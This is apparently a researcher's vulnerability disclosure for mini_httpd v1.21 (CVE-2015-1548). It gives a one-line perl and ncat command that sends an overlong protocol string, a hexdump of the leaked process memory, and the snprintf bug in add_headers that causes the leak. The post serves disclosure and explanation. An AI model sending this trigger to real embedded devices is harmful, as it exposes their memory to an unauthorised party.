( en hu ) Blog Services Contact

mini_httpd v1.21 information disclosure

Peter Kasza

A small webserver for your devices

mini_httpd is a small webserver which is used mostly in embedded environments like routers, modems and industrial control devices. The most prevalent version on the internet is based on mini_httpd/1.19 19dec2003. The webserver usually contains vendor specific patches.

Information disclosure

The webserver contains an information disclosure vulnerability. An attacker can specify a long enough protocol string to reveal parts of the processes memory. The vulnerability affects v1.21 and earlier.

Triggering the bug

1
perl -e 'print "GET / " . "X"x65536 . "/Y" . "\r\n\r\n"' | ncat localhost 80

Response from the server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
00000000  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
*
00002700  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 00  |XXXXXXXXXXXXXXX.|
00002710  90 60 1f 95 ff 7f 00 00  d0 5f 1f 95 ff 7f 00 00  |.`......._......|
00002720  00 00 00 00 00 00 00 00  10 87 d8 1b b1 7f 00 00  |................|
00002730  60 00 00 00 00 00 00 00  98 89 40 00 00 00 00 00  |`.........@.....|
00002740  ff ff 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00002750  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002790  00 0c 00 00 00 00 00 00  ff ff ff ff 00 00 00 00  |................|
000027a0  04 00 00 00 00 00 00 00  23 85 40 00 00 00 00 00  |........#.@.....|
000027b0  30 00 00 00 00 00 00 00  34 00 00 00 00 00 00 00  |0.......4.......|
000027c0  03 00 00 00 00 00 00 00  2d 4a 40 00 00 00 00 00  |........-J@.....|
000027d0  8d 0c 85 42 00 00 00 00  a1 49 40 00 00 00 00 00  |...B.....I@.....|
000027e0  00 00 00 00 00 00 00 00  00 00 00 00 04 00 00 00  |................|
000027f0  00 00 00 00 00 00 00 00  50 01 20 95 ff 7f 00 00  |........P. .....|
00002800  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00009d30  74 65 78 74 2f 68 74 6d  6c 3b 20 63 68 61 72 73  |text/html; chars|
00009d40  65 74 3d 55 54 46 2d 38  00 00 00 00 00 00 00 00  |et=UTF-8........|
00009d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000a130  2e 00 69 6e 64 65 78 2e  68 74 6d 6c 00 00 00 00  |..index.html....|
0000a140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000c840  40 2e 61 00 00 00 00 00  80 76 20 95 ff 7f 00 00  |@.a......v .....|
0000c850  b0 76 20 95 ff 7f 00 00  58 6e 36 02 00 00 00 00  |.v .....Xn6.....|
0000c860  57 89 40 00 00 00 00 00  ff 7f 00 00 00 00 00 00  |W.@.............|
0000c870  00 00 00 00 00 00 00 00  35 57 40 00 00 00 00 00  |........5W@.....|
0000c880  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000c8a0  2e 2f 69 6e 64 65 78 2e  68 74 6d 6c 00 00 00 00  |./index.html....|
0000c8b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00010000  00 00 00 00 00 00 00 00  00 00 00 53 65 72 76 65  |...........Serve|
00010010  72 3a 20 6d 69 6e 69 5f  68 74 74 70 64 2f 31 2e  |r: mini_httpd/1.|
00010020  32 31 20 31 38 6f 63 74  32 30 31 34 0d 0a 44 61  |21 18oct2014..Da|
00010030  74 65 3a 20 46 72 69 2c  20 32 33 20 4a 61 6e 20  |te: Fri, 23 Jan |
00010040  32 30 31 35 20 31 31 3a  34 37 3a 35 31 20 47 4d  |2015 11:47:51 GM|
00010050  54 0d 0a 43 6f 6e 74 65  6e 74 2d 54 79 70 65 3a  |T..Content-Type:|
00010060  20 74 65 78 74 2f 68 74  6d 6c 3b 20 63 68 61 72  | text/html; char|
00010070  73 65 74 3d 55 54 46 2d  38 0d 0a 43 6f 6e 74 65  |set=UTF-8..Conte|
00010080  6e 74 2d 4c 65 6e 67 74  68 3a 20 33 32 36 0d 0a  |nt-Length: 326..|
00010090  4c 61 73 74 2d 4d 6f 64  69 66 69 65 64 3a 20 46  |Last-Modified: F|
000100a0  72 69 2c 20 31 33 20 4d  61 79 20 32 30 30 35 20  |ri, 13 May 2005 |
000100b0  32 30 3a 32 32 3a 33 37  20 47 4d 54 0d 0a 43 6f  |20:22:37 GMT..Co|
000100c0  6e 6e 65 63 74 69 6f 6e  3a 20 63 6c 6f 73 65 0d  |nnection: close.|

Source of the bug

The vulnerability occurs because the server incorrectly calculates the size of the response. The snprintf function returns the number of bytes needed to store the message if the buffer size is too small, instead of returning the number of bytes that were actually written. mini_httpd blindly trusts the size returned by snprintf and it will return a chunk of memory past the buffer, when the protocol string is longer than 10000 bytes.

1
2
3
4
5
6
7
// mini_httpd.c:2500
static void add_headers(...) {
    char buf[10000];
    ...
    buflen = snprintf( buf, sizeof(buf), "%s %d %s\015\012", protocol, status, title );
    add_to_response( buf, buflen );
}

Edit: MITRE assigned the following CVE number for the issue: CVE-2015-1548